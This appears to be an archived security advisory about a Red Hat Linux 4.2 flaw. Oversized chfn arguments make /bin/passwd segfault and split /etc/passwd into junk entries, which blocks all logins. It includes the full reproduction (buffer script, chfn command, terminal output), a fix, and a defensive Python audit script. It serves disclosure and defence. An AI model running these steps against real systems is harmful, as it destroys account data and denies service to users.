COMMAND

    /bin/passwd

SYSTEMS AFFECTED

    Linux (RedHat 4.2)

PROBLEM

    Alex Mottram found a possible buffer overrun / DoS in /bin/passwd
    (at least on Red Hat Linux 4.2 from the Red Hat PowerTools 4.2 CD
    with all relevant patches applied).

    Configuration Information and exploit:

    [alex@machine alex]$ cat /etc/redhat-release
    release 4.2 (Biltmore)

    rpm -qf /usr/bin/chfn
    util-linux-2.5-38

    rpm -qf /usr/bin/passwd
    passwd-0.50-7

    rpm -q pam
    pam-0.57-4

    [alex@machine alex]$ cat /etc/pam.conf
    #
    #  THIS FILE IS NOW OBSOLETE
    #
    #  The contents of this file should be replaced by files in the
    #  /etc/pam.d/ directory.
    #
    #

    [alex@machine alex]$ ls /etc/pam.d/
    chfn    ftp     login   passwd  rlogin  samba   xdm
    chsh    imap    other   rexec   rsh     su

    [alex@machine alex]$ cat /etc/pam.d/chfn
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so shadow nullok use_authtok
    session    required     /lib/security/pam_pwdb.so

    [alex@machine alex]$ cat /etc/pam.d/passwd
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so use_authtok nullok

    [alex@machine /tmp]$ tail /etc/passwd
    alex:x:500:500:alex,,,,:/home/alex:/bin/bash
    zane:x:501:501:zane,,,,:/home/zane:/bin/bash
    someone:x:502:502::/home/someone:/bin/bash

    [alex@machine /tmp]$ cat pass
    #this test has 11719 bytes of the sequence "0123456789", Xs work just as well.
    export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
    /bin/bash

    [alex@machine /tmp]$ ./pass
    [alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
    Changing finger information for alex.
    Password:
    Finger information changed.
    [alex@machine /tmp]$ wc /etc/passwd
         26      29    2068 /etc/passwd

    ** At this point, the passwd entry for 'alex' is >48k long **

    [alex@machine alex]$ passwd
    Changing password for alex
    (current) UNIX password:
    New UNIX password:
    Segmentation fault

    ** LOGIN AS SECOND USER **
    [zane@machine zane]$ passwd
    Changing password for zane
    (current) UNIX password:
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully

    'passwd' just  snipped our  one big  line into  nice 8k chunks and
    created some junk passwd file entries.

    [zane@machine zane]$ wc /etc/passwd
         31      34   47829 /etc/passwd

    [zane@machine zane]$ su someuser
    su: user someuser does not exist
    [zane@machine zane]$ su alex
    su: user alex does not exist
    [zane@machine zane]$ su zane
    su: user zane does not exist

    Other services checked (ftp, pop-3, etc.) were equally screwed.

SOLUTION

    Remove the suid bit from chfn so that unprivileged users cannot use
    it at all.  There have been plenty of bugs in chfn, so it is not
    paranoid to delete the file altogether.  Changing finger information
    is the admin's job, not the user's.

    OpenBSD constrains the password line to at most 1023 characters
    (_including_ the expansion of every '&' in the gecos field to the
    username).
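
    The following audit script is an added example and is not part of the
    advisory or of any of the tools it names.  It applies the OpenBSD-style
    limit quoted above (1023 characters per line, counting each '&' in the
    gecos field as the login name) to passwd-format text, and also flags
    the malformed fragments that the 8k chopping described in PROBLEM leaves
    behind (wrong field count, non-numeric uid/gid, duplicate names).  The
    sample entries are constructed for the demonstration; MAX_LINE and the
    function names are this example's own choices.

```python
"""Audit passwd-format text for entries that would break passwd(1).

Added example, not code from the advisory.  Rule applied: a line may be at
most MAX_LINE characters after every '&' in the gecos field is replaced by
the login name (the OpenBSD constraint cited in the SOLUTION section).
"""

MAX_LINE = 1023       # OpenBSD limit cited in the advisory (assumption: applied as-is)
PASSWD_FIELDS = 7     # name:passwd:uid:gid:gecos:dir:shell


def expanded_length(line: str) -> int:
    """Length of a passwd line once each '&' in the gecos field is expanded
    to the login name.  Lines that do not split into 7 fields are measured
    as-is, since there is no gecos field to expand."""
    fields = line.split(":")
    if len(fields) != PASSWD_FIELDS:
        return len(line)
    name, gecos = fields[0], fields[4]
    expanded_gecos = gecos.replace("&", name)
    return len(line) - len(gecos) + len(expanded_gecos)


def check_passwd_line(line: str) -> list[str]:
    """Return the problems found in one passwd line; [] means it looks sane."""
    problems = []
    fields = line.split(":")
    if len(fields) != PASSWD_FIELDS:
        # This is what the junk chunks left by passwd(1) look like.
        problems.append(f"expected {PASSWD_FIELDS} fields, got {len(fields)}")
        return problems
    name, _pw, uid, gid, _gecos, _home, _shell = fields
    if not name:
        problems.append("empty login name")
    if not uid.isdigit() or not gid.isdigit():
        problems.append("uid/gid not numeric")
    n = expanded_length(line)
    if n > MAX_LINE:
        problems.append(f"line is {n} chars after '&' expansion (limit {MAX_LINE})")
    return problems


def audit_passwd(text: str) -> dict[int, list[str]]:
    """Check every non-empty line; keys are 1-based line numbers with problems."""
    report = {}
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line:
            continue
        probs = check_passwd_line(line)
        name = line.split(":", 1)[0]
        if name and name in seen:
            probs.append(f"duplicate login name {name!r}")
        seen.add(name)
        if probs:
            report[lineno] = probs
    return report


# Constructed sample: two sane entries, one whose gecos field is short in raw
# bytes but far over the limit once '&' expands, and one fragment of the kind
# passwd(1) left behind after chopping an oversized line into 8k chunks.
SAMPLE = "\n".join([
    "alex:x:500:500:alex,,,,:/home/alex:/bin/bash",
    "zane:x:501:501:zane,,,,:/home/zane:/bin/bash",
    "longname:x:502:502:" + "&" * 600 + ":/home/longname:/bin/bash",
    "X" * 40,   # junk chunk: no ':' separators at all
])

if __name__ == "__main__":
    for lineno, probs in sorted(audit_passwd(SAMPLE).items()):
        print(f"line {lineno}: " + "; ".join(probs))
```

    Run it against a copy of /etc/passwd (read the file and pass the text to
    audit_passwd) after any incident like the one above; a clean file yields
    an empty report, and any entry that would exceed the OpenBSD limit shows
    up before passwd(1) gets a chance to mangle it.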